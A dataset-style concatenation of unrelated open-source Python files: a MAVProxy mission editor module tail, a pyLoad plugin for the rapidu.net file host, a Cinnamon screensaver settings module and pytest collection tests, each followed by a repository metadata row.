elif mtype in ['WAYPOINT', 'MISSION_ITEM']:
#still expecting wps?
if (len(self.wps_received) < self.num_wps_expected):
#if we haven't already received this wp, write it to the GUI:
if (m.seq not in self.wps_received.keys()):
self.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_SET_MISS_ITEM,
num=m.seq,command=m.command,param1=m.param1,
param2=m.param2,param3=m.param3,param4=m.param4,
lat=m.x,lon=m.y,alt=m.z,frame=m.frame))
self.wps_received[m.seq] = True
def child_task(self, q, l, gq, gl, cw_sem):
'''child process - this holds GUI elements'''
mp_util.child_close_fds()
from ..lib import wx_processguard
from ..lib.wx_loader import wx
from MAVProxy.modules.mavproxy_misseditor import missionEditorFrame
self.app = wx.App(False)
self.app.frame = missionEditorFrame.MissionEditorFrame(parent=None,id=wx.ID_ANY)
self.app.frame.set_event_queue(q)
self.app.frame.set_event_queue_lock(l)
self.app.frame.set_gui_event_queue(gq)
self.app.frame.set_gui_event_queue_lock(gl)
self.app.frame.set_close_window_semaphore(cw_sem)
self.app.SetExitOnFrameDelete(True)
self.app.frame.Show()
# start a thread to monitor the "close window" semaphore:
class CloseWindowSemaphoreWatcher(threading.Thread):
def __init__(self, task, sem):
threading.Thread.__init__(self)
self.task = task
self.sem = sem
def run(self):
self.sem.acquire(True)
self.task.app.ExitMainLoop()
watcher_thread = CloseWindowSemaphoreWatcher(self, cw_sem)
watcher_thread.start()
self.app.MainLoop()
# tell the watcher it is OK to quit:
cw_sem.release()
watcher_thread.join()
def close(self):
'''close the Mission Editor window'''
self.time_to_quit = True
self.close_window.release()
if self.child.is_alive():
self.child.join(1)
self.child.terminate()
self.mavlink_message_queue_handler.join()
self.event_queue_lock.acquire()
self.event_queue.put(MissionEditorEvent(me_event.MEE_TIME_TO_QUIT));
self.event_queue_lock.release()
def read_waypoints(self):
self.module('wp').cmd_wp(['list'])
def update_map_click_position(self, new_click_pos):
self.gui_event_queue_lock.acquire()
self.gui_event_queue.put(MissionEditorEvent(
me_event.MEGE_SET_LAST_MAP_CLICK_POS,click_pos=new_click_pos))
self.gui_event_queue_lock.release()
def init(mpstate):
'''initialise module'''
return MissionEditorModule(mpstate)
| njoubert/MAVProxy | MAVProxy/modules/mavproxy_misseditor/__init__.py | Python | gpl-3.0 | 13,978 | 0.00651 |
# -*- coding: utf-8 -*-
import time
import pycurl
from module.plugins.captcha.ReCaptcha import ReCaptcha
from module.plugins.internal.misc import json
from module.plugins.internal.SimpleHoster import SimpleHoster
class RapiduNet(SimpleHoster):
__name__ = "RapiduNet"
__type__ = "hoster"
__version__ = "0.14"
__status__ = "testing"
__pattern__ = r'https?://(?:www\.)?rapidu\.net/(?P<ID>\d{10})'
__config__ = [("activated", "bool", "Activated", True),
("use_premium", "bool", "Use premium account if available", True),
("fallback", "bool",
"Fallback to free download if premium fails", True),
("chk_filesize", "bool", "Check file size", True),
("max_wait", "int", "Reconnect if waiting time is greater than minutes", 10)]
__description__ = """Rapidu.net hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("prOq", None)]
COOKIES = [("rapidu.net", "rapidu_lang", "en")]
INFO_PATTERN = r'<h1 title="(?P<N>.*)">.*</h1>\s*<small>(?P<S>\d+(\.\d+)?)\s(?P<U>\w+)</small>'
OFFLINE_PATTERN = r'<h1>404'
ERROR_PATTERN = r'<div class="error">'
RECAPTCHA_KEY = r'6Ld12ewSAAAAAHoE6WVP_pSfCdJcBQScVweQh8Io'
def setup(self):
self.resume_download = True
self.multiDL = self.premium
def handle_free(self, pyfile):
self.req.http.lastURL = pyfile.url
self.req.http.c.setopt(
pycurl.HTTPHEADER,
["X-Requested-With: XMLHttpRequest"])
jsvars = self.get_json_response("https://rapidu.net/ajax.php",
get={'a': "getLoadTimeToDownload"},
post={'_go': ""})
if str(jsvars['timeToDownload']) == "stop":
t = (24 * 60 * 60) - (int(time.time()) %
(24 * 60 * 60)) + time.altzone
self.log_info(_("You've reach your daily download transfer"))
# @NOTE: check t in case of not synchronised clock
self.retry(10, 10 if t < 1 else None, _("Try tomorrow again"))
else:
self.wait(int(jsvars['timeToDownload']) - int(time.time()))
self.captcha = ReCaptcha(pyfile)
response, challenge = self.captcha.challenge(self.RECAPTCHA_KEY)
jsvars = self.get_json_response("https://rapidu.net/ajax.php",
get={'a': "getCheckCaptcha"},
post={'_go': "",
'captcha1': challenge,
'captcha2': response,
'fileId': self.info['pattern']['ID']})
if jsvars['message'] == "success":
self.link = jsvars['url']
def get_json_response(self, *args, **kwargs):
res = self.load(*args, **kwargs)
if not res.startswith('{'):
self.retry()
self.log_debug(res)
return json.loads(res)
| rlindner81/pyload | module/plugins/hoster/RapiduNet.py | Python | gpl-3.0 | 3,047 | 0.001313 |
#!/usr/bin/env python2
from SettingsWidgets import *
from gi.repository import Gtk, Gdk, GLib, Pango
import os, json, subprocess, re
from xml.etree import ElementTree
import gettext
LOCK_DELAY_OPTIONS = [
(0, _("Immediately")),
(15, _("After 15 seconds")),
(30, _("After 30 seconds")),
(60, _("After 1 minute")),
(120, _("After 2 minutes")),
(180, _("After 3 minutes")),
(300, _("After 5 minutes")),
(600, _("After 10 minutes")),
(1800, _("After 30 minutes")),
(3600, _("After 1 hour"))
]
LOCK_INACTIVE_OPTIONS = [
(0, _("Never")),
(60, _("After 1 minute")),
(300, _("After 5 minutes")),
(600, _("After 10 minutes")),
(900, _("After 15 minutes")),
(1800, _("After 30 minutes")),
(2700, _("After 45 minutes")),
(3600, _("After 1 hour"))
]
XSCREENSAVER_PATH = "/usr/share/xscreensaver/config/"
def list_header_func(row, before, user_data):
if before and not row.get_header():
row.set_header(Gtk.Separator(orientation=Gtk.Orientation.HORIZONTAL))
class Module:
name = "screensaver"
category = "prefs"
comment = _("Manage screen lock settings")
def __init__(self, content_box):
keywords = _("screensaver, lock, password, away, message")
sidePage = SidePage(_("Screensaver"), "cs-screensaver", keywords, content_box, module=self)
self.sidePage = sidePage
def on_module_selected(self):
if self.loaded:
return
print "Loading Screensaver module"
schema = "org.cinnamon.desktop.screensaver"
self.settings = Gio.Settings.new(schema)
self.sidePage.stack = SettingsStack()
self.sidePage.add_widget(self.sidePage.stack)
# Screensaver
page = SettingsPage()
page.expand = True
self.sidePage.stack.add_titled(page, "screensaver", _("Screensaver"))
settings = ScreensaverBox(_("Select screensaver"))
page.pack_start(settings, True, True, 0)
# Settings
page = SettingsPage()
self.sidePage.stack.add_titled(page, "settings", _("Settings"))
settings = page.add_section(_("Lock settings"))
size_group = Gtk.SizeGroup.new(Gtk.SizeGroupMode.HORIZONTAL)
widget = GSettingsSwitch(_("Lock the computer when put to sleep"), "org.cinnamon.settings-daemon.plugins.power", "lock-on-suspend")
widget.set_tooltip_text(_("Enable this option to require a password when the computer wakes up from suspend"))
settings.add_row(widget)
widget = GSettingsSwitch(_("Lock the computer when the screen turns off"), schema, "lock-enabled")
widget.set_tooltip_text(_("Enable this option to require a password when the screen turns itself off, or when the screensaver activates after a period of inactivity"))
settings.add_row(widget)
widget = GSettingsComboBox(_("Delay before locking the screen"), schema, "lock-delay", LOCK_DELAY_OPTIONS, valtype="uint", size_group=size_group)
widget.set_tooltip_text(_("This option defines the amount of time to wait before locking the screen, after showing the screensaver or after turning off the screen"))
settings.add_reveal_row(widget, schema, "lock-enabled")
widget = GSettingsComboBox(_("Lock the computer when inactive"), "org.cinnamon.desktop.session", "idle-delay", LOCK_INACTIVE_OPTIONS, valtype="uint", size_group=size_group)
widget.set_tooltip_text(_("This option defines the amount of time to wait before locking the screen, when the computer is not being used"))
settings.add_row(widget)
settings = page.add_section(_("Away message"))
widget = GSettingsEntry(_("Show this message when the screen is locked"), schema, "default-message")
widget.set_child_packing(widget.content_widget, True, True, 0, Gtk.PackType.START)
widget.set_tooltip_text(_("This is the default message displayed on your lock screen"))
settings.add_row(widget)
settings.add_row(GSettingsFontButton(_("Font"), "org.cinnamon.desktop.screensaver", "font-message"))
widget = GSettingsSwitch(_("Ask for a custom message when locking the screen from the menu"), schema, "ask-for-away-message")
widget.set_tooltip_text(_("This option allows you to type a message each time you lock the screen from the menu"))
settings.add_row(widget)
# Date
page = SettingsPage()
self.sidePage.stack.add_titled(page, "date", _("Date"))
settings = page.add_section(_("Date and Time"))
size_group = Gtk.SizeGroup.new(Gtk.SizeGroupMode.HORIZONTAL)
widget = GSettingsSwitch(_("Use a custom date and time format"), schema, "use-custom-format")
settings.add_row(widget)
widget = GSettingsEntry(_("Time Format"), schema, "time-format", size_group=size_group)
settings.add_reveal_row(widget, schema, "use-custom-format")
widget = GSettingsEntry(_("Date Format: "), schema, "date-format", size_group=size_group)
settings.add_reveal_row(widget, schema, "use-custom-format")
widget = GSettingsFontButton(_("Time Font"), "org.cinnamon.desktop.screensaver", "font-time", size_group=size_group)
settings.add_row(widget)
widget = GSettingsFontButton(_("Date Font"), "org.cinnamon.desktop.screensaver", "font-date", size_group=size_group)
settings.add_row(widget)
class ScreensaverBox(Gtk.Box):
def __init__(self, title):
Gtk.Box.__init__(self)
self.set_orientation(Gtk.Orientation.VERTICAL)
frame = Gtk.Frame()
frame.set_shadow_type(Gtk.ShadowType.IN)
frame_style = frame.get_style_context()
frame_style.add_class("view")
self.pack_start(frame, True, True, 0)
schema = "org.cinnamon.desktop.screensaver"
self.settings = Gio.Settings.new(schema)
self.webkit_executable = None
self.xscreensaver_executable = None
self.proc = None
self.current_name = self.settings.get_string("screensaver-name")
if self.current_name == "webkit@cinnamon.org":
self.current_name = self.settings.get_string("screensaver-webkit-theme")
elif self.current_name == "xscreensaver@cinnamon.org":
self.current_name = "xscreensaver-" + self.settings.get_string("xscreensaver-hack")
self.main_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
frame.add(self.main_box)
toolbar = Gtk.Toolbar.new()
Gtk.StyleContext.add_class(Gtk.Widget.get_style_context(toolbar), "cs-header")
label = Gtk.Label()
label.set_markup("<b>%s</b>" % title)
title_holder = Gtk.ToolItem()
title_holder.add(label)
toolbar.add(title_holder)
self.main_box.add(toolbar)
toolbar_separator = Gtk.Separator(orientation=Gtk.Orientation.HORIZONTAL)
self.main_box.add(toolbar_separator)
separator_context = toolbar_separator.get_style_context()
frame_color = frame_style.get_border_color(Gtk.StateFlags.NORMAL).to_string()
css_provider = Gtk.CssProvider()
css_provider.load_from_data(".separator { -GtkWidget-wide-separators: 0; \
color: %s; \
}" % frame_color)
separator_context.add_provider(css_provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)
self.socket_box = Gtk.Box()
self.socket_box.set_border_width(30)
self.socket_box.set_size_request(-1, 300)
self.socket_box.override_background_color(Gtk.StateFlags.NORMAL, Gdk.RGBA(0, 0, 0, 1))
self.main_box.pack_start(self.socket_box, False, False, 0)
self.main_box.add(Gtk.Separator(orientation=Gtk.Orientation.HORIZONTAL))
scw = Gtk.ScrolledWindow()
scw.expand = True
scw.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)
scw.set_shadow_type(Gtk.ShadowType.NONE)
self.main_box.pack_start(scw, True, True, 0)
self.list_box = Gtk.ListBox()
self.list_box.set_selection_mode(Gtk.SelectionMode.SINGLE)
self.list_box.set_header_func(list_header_func, None)
self.list_box.connect("row-activated", self.on_row_activated)
scw.add(self.list_box)
self.gather_screensavers()
self.socket_box.connect("map", self.on_mapped)
def gather_screensavers(self):
row = ScreensaverRow("", _("Screen Locker"), _("The standard cinnamon lock screen"), "", "default")
self.add_row(row)
if self.current_name == "":
self.list_box.select_row(row)
dirs = [os.path.expanduser("~/.local/share/cinnamon-screensaver/screensavers")] + \
[os.path.join(x, "cinnamon-screensaver/screensavers/") for x in GLib.get_system_data_dirs()]
things = []
for directory in dirs:
if not os.path.isdir(directory):
continue
things += [os.path.join(directory, x) for x in os.listdir(directory)]
for path in things:
if not os.path.isdir(path):
continue
# Recurse inside if it is webkit
if os.path.basename(path.rstrip('/')) == "webkit@cinnamon.org":
webkits = [os.path.join(path, x) for x in os.listdir(path)]
for theme in webkits:
if os.path.basename(theme) == 'main':
self.webkit_executable = theme
continue
if not os.path.isdir(theme):
continue
self.parse_dir(theme, path, "webkit")
continue
if os.path.basename(path.rstrip('/')) == "xscreensaver@cinnamon.org":
if os.path.exists(os.path.join(path, 'main')):
self.xscreensaver_executable = os.path.join(path, 'main')
continue
self.parse_dir(path, path, "standalone")
if self.xscreensaver_executable is not None and os.path.exists(XSCREENSAVER_PATH):
xscreensavers = []
try:
gettext.install("xscreensaver", "/usr/share/locale")
for item in sorted(os.listdir(XSCREENSAVER_PATH)):
if not item.endswith(".xml"):
continue
path = os.path.join(XSCREENSAVER_PATH, item)
try:
tree = ElementTree.parse(path);
root = tree.getroot()
name = root.attrib["name"]
label = root.attrib["_label"]
description = root.find("_description").text.strip()
label = _(label)
description = _(description)
row = ScreensaverRow(name, label, description, XSCREENSAVER_PATH, "xscreensaver")
xscreensavers.append(row)
except Exception, detail:
print "Unable to parse xscreensaver information at %s: %s" % (path, detail)
xscreensavers = sorted(xscreensavers, key=lambda x: x.name)
for xscreensaver in xscreensavers:
self.add_row(xscreensaver)
if self.current_name == "xscreensaver-" + xscreensaver.uuid:
self.list_box.select_row(xscreensaver)
gettext.install("cinnamon", "/usr/share/locale")
except Exception, detail:
print "Unable to parse xscreensaver hacks: %s" % detail
def parse_dir(self, path, directory, ss_type):
try:
metadata = open(os.path.join(path, "metadata.json"), 'r').read()
data = json.loads(metadata)
name = data["name"]
uuid = data["uuid"]
assert uuid == os.path.basename(path.rstrip('/'))
try:
description = data["description"]
except KeyError:
description = None
except ValueError:
description = None
row = ScreensaverRow(uuid, name, description, directory, ss_type)
self.add_row(row)
if self.current_name == uuid:
self.list_box.select_row(row)
except:
print "Unable to parse screensaver information at %s" % path
def on_row_activated(self, list_box, row):
row = self.list_box.get_selected_row()
if not row:
return
uuid = row.uuid
path = row.path
ss_type = row.ss_type
if uuid == '':
self.settings.set_string('screensaver-name', '')
elif ss_type == 'webkit':
self.settings.set_string('screensaver-name', 'webkit@cinnamon.org')
self.settings.set_string('screensaver-webkit-theme', uuid)
elif ss_type == 'xscreensaver':
self.settings.set_string('screensaver-name', 'xscreensaver@cinnamon.org')
self.settings.set_string('xscreensaver-hack', uuid)
else:
self.settings.set_string('screensaver-name', uuid)
if ss_type == 'default':
self.socket_box.foreach(lambda x, y: x.destroy(), None)
px = GdkPixbuf.Pixbuf.new_from_file_at_size("/usr/share/cinnamon/thumbnails/wallclock.png", -1, 240)
w = Gtk.Image.new_from_pixbuf(px)
w.show()
self.socket_box.pack_start(w, True, True, 0)
if ss_type == 'webkit':
command = [self.webkit_executable, "--plugin", uuid]
elif ss_type == 'xscreensaver':
command = [self.xscreensaver_executable, "--hack", uuid]
else:
command = os.path.join(path, "main")
try:
self.proc = subprocess.Popen(command, stdout=subprocess.PIPE)
except:
return
line = self.proc.stdout.readline()
while line:
match = re.match('^\s*WINDOW ID=(\d+)\s*$', line.decode())
if match:
self.socket_box.foreach(lambda x, y: x.destroy(), None)
socket = Gtk.Socket()
socket.show()
self.socket_box.pack_start(socket, True, True, 0)
socket.add_id(int(match.group(1)))
break
line = self.proc.stdout.readline()
def on_mapped(self, widget):
self.on_row_activated(None, None)
GObject.idle_add(self.idle_scroll_to_selection)
def idle_scroll_to_selection(self):
row = self.list_box.get_selected_row()
alloc = row.get_allocation()
adjustment = self.list_box.get_adjustment()
adjustment.set_value(alloc.y)
def add_row(self, row):
self.list_box.add(row)
class ScreensaverRow(Gtk.ListBoxRow):
def __init__(self, uuid, name, description, path, ss_type):
Gtk.ListBoxRow.__init__(self)
self.uuid = uuid
self.name = name
# Add ... to the description if it is cut in the middle of a line. If
# the next line is empty, we interpret this as a paragraph break and
# don't insert ...
desc = description.split('\n')
if len(desc) <= 1 or len(desc[1].strip()) == 0:
self.short_description = desc[0]
else:
self.short_description = desc[0] + "..."
self.description = description
self.path = path
self.ss_type = ss_type
self.set_tooltip_text(self.description)
widget = SettingsWidget()
grid = Gtk.Grid()
grid.set_column_spacing(15)
widget.pack_start(grid, True, True, 0)
self.desc_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
self.desc_box.props.hexpand = True
self.desc_box.props.halign = Gtk.Align.START
self.name_label = Gtk.Label()
self.name_label.set_markup("<b>%s</b>" % self.name)
self.name_label.props.xalign = 0.0
self.desc_box.add(self.name_label)
self.comment_label = Gtk.Label()
self.comment_label.set_markup("<small>%s</small>" % self.short_description)
self.comment_label.props.xalign = 0.0
self.comment_label.set_ellipsize(Pango.EllipsizeMode.END)
self.comment_label.set_max_width_chars(80)
self.desc_box.add(self.comment_label)
grid.attach(self.desc_box, 0, 0, 1, 1)
type_box = Gtk.Box()
type_label = Gtk.Label()
type_label.set_markup("<small><i>%s</i></small>" % self.ss_type)
type_box.pack_start(type_label, True, True, 0)
grid.attach_next_to(type_box, self.desc_box, Gtk.PositionType.RIGHT, 1, 1)
self.add(widget)
| mattthur/Cinnamon | files/usr/lib/cinnamon-settings/modules/cs_screensaver.py | Python | gpl-2.0 | 16,729 | 0.003288 |
import pytest, py
from _pytest.main import Session, EXIT_NOTESTSCOLLECTED
class TestCollector:
def test_collect_versus_item(self):
from pytest import Collector, Item
assert not issubclass(Collector, Item)
assert not issubclass(Item, Collector)
def test_compat_attributes(self, testdir, recwarn):
modcol = testdir.getmodulecol("""
def test_pass(): pass
def test_fail(): assert 0
""")
recwarn.clear()
assert modcol.Module == pytest.Module
assert modcol.Class == pytest.Class
assert modcol.Item == pytest.Item
assert modcol.File == pytest.File
assert modcol.Function == pytest.Function
def test_check_equality(self, testdir):
modcol = testdir.getmodulecol("""
def test_pass(): pass
def test_fail(): assert 0
""")
fn1 = testdir.collect_by_name(modcol, "test_pass")
assert isinstance(fn1, pytest.Function)
fn2 = testdir.collect_by_name(modcol, "test_pass")
assert isinstance(fn2, pytest.Function)
assert fn1 == fn2
assert fn1 != modcol
if py.std.sys.version_info < (3, 0):
assert cmp(fn1, fn2) == 0
assert hash(fn1) == hash(fn2)
fn3 = testdir.collect_by_name(modcol, "test_fail")
assert isinstance(fn3, pytest.Function)
assert not (fn1 == fn3)
assert fn1 != fn3
for fn in fn1,fn2,fn3:
assert fn != 3
assert fn != modcol
assert fn != [1,2,3]
assert [1,2,3] != fn
assert modcol != fn
def test_getparent(self, testdir):
modcol = testdir.getmodulecol("""
class TestClass:
def test_foo():
pass
""")
cls = testdir.collect_by_name(modcol, "TestClass")
fn = testdir.collect_by_name(
testdir.collect_by_name(cls, "()"), "test_foo")
parent = fn.getparent(pytest.Module)
assert parent is modcol
parent = fn.getparent(pytest.Function)
assert parent is fn
parent = fn.getparent(pytest.Class)
assert parent is cls
def test_getcustomfile_roundtrip(self, testdir):
hello = testdir.makefile(".xxx", hello="world")
testdir.makepyfile(conftest="""
import pytest
class CustomFile(pytest.File):
pass
def pytest_collect_file(path, parent):
if path.ext == ".xxx":
return CustomFile(path, parent=parent)
""")
node = testdir.getpathnode(hello)
assert isinstance(node, pytest.File)
assert node.name == "hello.xxx"
nodes = node.session.perform_collect([node.nodeid], genitems=False)
assert len(nodes) == 1
assert isinstance(nodes[0], pytest.File)
class TestCollectFS:
def test_ignored_certain_directories(self, testdir):
tmpdir = testdir.tmpdir
tmpdir.ensure("build", 'test_notfound.py')
tmpdir.ensure("dist", 'test_notfound.py')
tmpdir.ensure("_darcs", 'test_notfound.py')
tmpdir.ensure("CVS", 'test_notfound.py')
tmpdir.ensure("{arch}", 'test_notfound.py')
tmpdir.ensure(".whatever", 'test_notfound.py')
tmpdir.ensure(".bzr", 'test_notfound.py')
tmpdir.ensure("normal", 'test_found.py')
for x in tmpdir.visit("test_*.py"):
x.write("def test_hello(): pass")
result = testdir.runpytest("--collect-only")
s = result.stdout.str()
assert "test_notfound" not in s
assert "test_found" in s
def test_custom_norecursedirs(self, testdir):
testdir.makeini("""
[pytest]
norecursedirs = mydir xyz*
""")
tmpdir = testdir.tmpdir
tmpdir.ensure("mydir", "test_hello.py").write("def test_1(): pass")
tmpdir.ensure("xyz123", "test_2.py").write("def test_2(): 0/0")
tmpdir.ensure("xy", "test_ok.py").write("def test_3(): pass")
rec = testdir.inline_run()
rec.assertoutcome(passed=1)
rec = testdir.inline_run("xyz123/test_2.py")
rec.assertoutcome(failed=1)
def test_testpaths_ini(self, testdir, monkeypatch):
testdir.makeini("""
[pytest]
testpaths = gui uts
""")
tmpdir = testdir.tmpdir
tmpdir.ensure("env", "test_1.py").write("def test_env(): pass")
tmpdir.ensure("gui", "test_2.py").write("def test_gui(): pass")
tmpdir.ensure("uts", "test_3.py").write("def test_uts(): pass")
# executing from rootdir only tests from `testpaths` directories
# are collected
items, reprec = testdir.inline_genitems('-v')
assert [x.name for x in items] == ['test_gui', 'test_uts']
# check that explicitly passing directories in the command-line
# collects the tests
for dirname in ('env', 'gui', 'uts'):
items, reprec = testdir.inline_genitems(tmpdir.join(dirname))
assert [x.name for x in items] == ['test_%s' % dirname]
# changing cwd to each subdirectory and running pytest without
# arguments collects the tests in that directory normally
for dirname in ('env', 'gui', 'uts'):
monkeypatch.chdir(testdir.tmpdir.join(dirname))
items, reprec = testdir.inline_genitems()
assert [x.name for x in items] == ['test_%s' % dirname]
class TestCollectPluginHookRelay:
def test_pytest_collect_file(self, testdir):
wascalled = []
class Plugin:
def pytest_collect_file(self, path, parent):
if not path.basename.startswith("."):
# Ignore hidden files, e.g. .testmondata.
wascalled.append(path)
testdir.makefile(".abc", "xyz")
pytest.main([testdir.tmpdir], plugins=[Plugin()])
assert len(wascalled) == 1
assert wascalled[0].ext == '.abc'
def test_pytest_collect_directory(self, testdir):
wascalled = []
class Plugin:
def pytest_collect_directory(self, path, parent):
wascalled.append(path.basename)
testdir.mkdir("hello")
testdir.mkdir("world")
pytest.main(testdir.tmpdir, plugins=[Plugin()])
assert "hello" in wascalled
assert "world" in wascalled
class TestPrunetraceback:
def test_custom_repr_failure(self, testdir):
p = testdir.makepyfile("""
import not_exists
""")
testdir.makeconftest("""
import pytest
def pytest_collect_file(path, parent):
return MyFile(path, parent)
class MyError(Exception):
pass
class MyFile(pytest.File):
def collect(self):
raise MyError()
def repr_failure(self, excinfo):
if excinfo.errisinstance(MyError):
return "hello world"
return pytest.File.repr_failure(self, excinfo)
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*ERROR collecting*",
"*hello world*",
])
@pytest.mark.xfail(reason="other mechanism for adding to reporting needed")
def test_collect_report_postprocessing(self, testdir):
p = testdir.makepyfile("""
import not_exists
""")
testdir.makeconftest("""
import pytest
def pytest_make_collect_report(__multicall__):
rep = __multicall__.execute()
rep.headerlines += ["header1"]
return rep
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*ERROR collecting*",
"*header1*",
])
class TestCustomConftests:
def test_ignore_collect_path(self, testdir):
testdir.makeconftest("""
def pytest_ignore_collect(path, config):
return path.basename.startswith("x") or \
path.basename == "test_one.py"
""")
sub = testdir.mkdir("xy123")
sub.ensure("test_hello.py").write("syntax error")
sub.join("conftest.py").write("syntax error")
testdir.makepyfile("def test_hello(): pass")
testdir.makepyfile(test_one="syntax error")
result = testdir.runpytest("--fulltrace")
assert result.ret == 0
result.stdout.fnmatch_lines(["*1 passed*"])
def test_ignore_collect_not_called_on_argument(self, testdir):
testdir.makeconftest("""
def pytest_ignore_collect(path, config):
return True
""")
p = testdir.makepyfile("def test_hello(): pass")
result = testdir.runpytest(p)
assert result.ret == 0
result.stdout.fnmatch_lines("*1 passed*")
result = testdir.runpytest()
assert result.ret == EXIT_NOTESTSCOLLECTED
result.stdout.fnmatch_lines("*collected 0 items*")
def test_collectignore_exclude_on_option(self, testdir):
testdir.makeconftest("""
collect_ignore = ['hello', 'test_world.py']
def pytest_addoption(parser):
parser.addoption("--XX", action="store_true", default=False)
def pytest_configure(config):
if config.getvalue("XX"):
collect_ignore[:] = []
""")
testdir.mkdir("hello")
testdir.makepyfile(test_world="def test_hello(): pass")
result = testdir.runpytest()
assert result.ret == EXIT_NOTESTSCOLLECTED
assert "passed" not in result.stdout.str()
result = testdir.runpytest("--XX")
assert result.ret == 0
assert "passed" in result.stdout.str()
def test_pytest_fs_collect_hooks_are_seen(self, testdir):
testdir.makeconftest("""
import pytest
class MyModule(pytest.Module):
pass
def pytest_collect_file(path, parent):
if path.ext == ".py":
return MyModule(path, parent)
""")
testdir.mkdir("sub")
testdir.makepyfile("def test_x(): pass")
result = testdir.runpytest("--collect-only")
result.stdout.fnmatch_lines([
"*MyModule*",
"*test_x*"
])
def test_pytest_collect_file_from_sister_dir(self, testdir):
sub1 = testdir.mkpydir("sub1")
sub2 = testdir.mkpydir("sub2")
conf1 = testdir.makeconftest("""
import pytest
class MyModule1(pytest.Module):
pass
def pytest_collect_file(path, parent):
if path.ext == ".py":
return MyModule1(path, parent)
""")
conf1.move(sub1.join(conf1.basename))
conf2 = testdir.makeconftest("""
import pytest
class MyModule2(pytest.Module):
pass
def pytest_collect_file(path, parent):
if path.ext == ".py":
return MyModule2(path, parent)
""")
conf2.move(sub2.join(conf2.basename))
p = testdir.makepyfile("def test_x(): pass")
p.copy(sub1.join(p.basename))
p.copy(sub2.join(p.basename))
result = testdir.runpytest("--collect-only")
result.stdout.fnmatch_lines([
"*MyModule1*",
"*MyModule2*",
"*test_x*"
])
class TestSession:
def test_parsearg(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
subdir = testdir.mkdir("sub")
subdir.ensure("__init__.py")
target = subdir.join(p.basename)
p.move(target)
subdir.chdir()
config = testdir.parseconfig(p.basename)
rcol = Session(config=config)
assert rcol.fspath == subdir
parts = rcol._parsearg(p.basename)
assert parts[0] == target
assert len(parts) == 1
parts = rcol._parsearg(p.basename + "::test_func")
assert parts[0] == target
assert parts[1] == "test_func"
assert len(parts) == 2
def test_collect_topdir(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
id = "::".join([p.basename, "test_func"])
# XXX migrate to collectonly? (see below)
config = testdir.parseconfig(id)
topdir = testdir.tmpdir
rcol = Session(config)
assert topdir == rcol.fspath
#rootid = rcol.nodeid
#root2 = rcol.perform_collect([rcol.nodeid], genitems=False)[0]
#assert root2 == rcol, rootid
colitems = rcol.perform_collect([rcol.nodeid], genitems=False)
assert len(colitems) == 1
assert colitems[0].fspath == p
def test_collect_protocol_single_function(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
id = "::".join([p.basename, "test_func"])
items, hookrec = testdir.inline_genitems(id)
item, = items
assert item.name == "test_func"
newid = item.nodeid
assert newid == id
py.std.pprint.pprint(hookrec.calls)
topdir = testdir.tmpdir # noqa
hookrec.assert_contains([
("pytest_collectstart", "collector.fspath == topdir"),
("pytest_make_collect_report", "collector.fspath == topdir"),
("pytest_collectstart", "collector.fspath == p"),
("pytest_make_collect_report", "collector.fspath == p"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.nodeid.startswith(p.basename)"),
("pytest_collectreport", "report.nodeid == ''")
])
def test_collect_protocol_method(self, testdir):
p = testdir.makepyfile("""
class TestClass:
def test_method(self):
pass
""")
normid = p.basename + "::TestClass::()::test_method"
for id in [p.basename,
p.basename + "::TestClass",
p.basename + "::TestClass::()",
normid,
]:
items, hookrec = testdir.inline_genitems(id)
assert len(items) == 1
assert items[0].name == "test_method"
newid = items[0].nodeid
assert newid == normid
def test_collect_custom_nodes_multi_id(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
testdir.makeconftest("""
import pytest
class SpecialItem(pytest.Item):
def runtest(self):
return # ok
class SpecialFile(pytest.File):
def collect(self):
return [SpecialItem(name="check", parent=self)]
def pytest_collect_file(path, parent):
if path.basename == %r:
return SpecialFile(fspath=path, parent=parent)
""" % p.basename)
id = p.basename
items, hookrec = testdir.inline_genitems(id)
py.std.pprint.pprint(hookrec.calls)
assert len(items) == 2
hookrec.assert_contains([
("pytest_collectstart",
"collector.fspath == collector.session.fspath"),
("pytest_collectstart",
"collector.__class__.__name__ == 'SpecialFile'"),
("pytest_collectstart",
"collector.__class__.__name__ == 'Module'"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.nodeid.startswith(p.basename)"),
#("pytest_collectreport",
# "report.fspath == %r" % str(rcol.fspath)),
])
def test_collect_subdir_event_ordering(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
aaa = testdir.mkpydir("aaa")
test_aaa = aaa.join("test_aaa.py")
p.move(test_aaa)
items, hookrec = testdir.inline_genitems()
assert len(items) == 1
py.std.pprint.pprint(hookrec.calls)
hookrec.assert_contains([
("pytest_collectstart", "collector.fspath == test_aaa"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport",
"report.nodeid.startswith('aaa/test_aaa.py')"),
])
def test_collect_two_commandline_args(self, testdir):
p = testdir.makepyfile("def test_func(): pass")
aaa = testdir.mkpydir("aaa")
bbb = testdir.mkpydir("bbb")
test_aaa = aaa.join("test_aaa.py")
p.copy(test_aaa)
test_bbb = bbb.join("test_bbb.py")
p.move(test_bbb)
id = "."
items, hookrec = testdir.inline_genitems(id)
assert len(items) == 2
py.std.pprint.pprint(hookrec.calls)
hookrec.assert_contains([
("pytest_collectstart", "collector.fspath == test_aaa"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.nodeid == 'aaa/test_aaa.py'"),
("pytest_collectstart", "collector.fspath == test_bbb"),
("pytest_pycollect_makeitem", "name == 'test_func'"),
("pytest_collectreport", "report.nodeid == 'bbb/test_bbb.py'"),
])
def test_serialization_byid(self, testdir):
testdir.makepyfile("def test_func(): pass")
items, hookrec = testdir.inline_genitems()
assert len(items) == 1
item, = items
items2, hookrec = testdir.inline_genitems(item.nodeid)
item2, = items2
assert item2.name == item.name
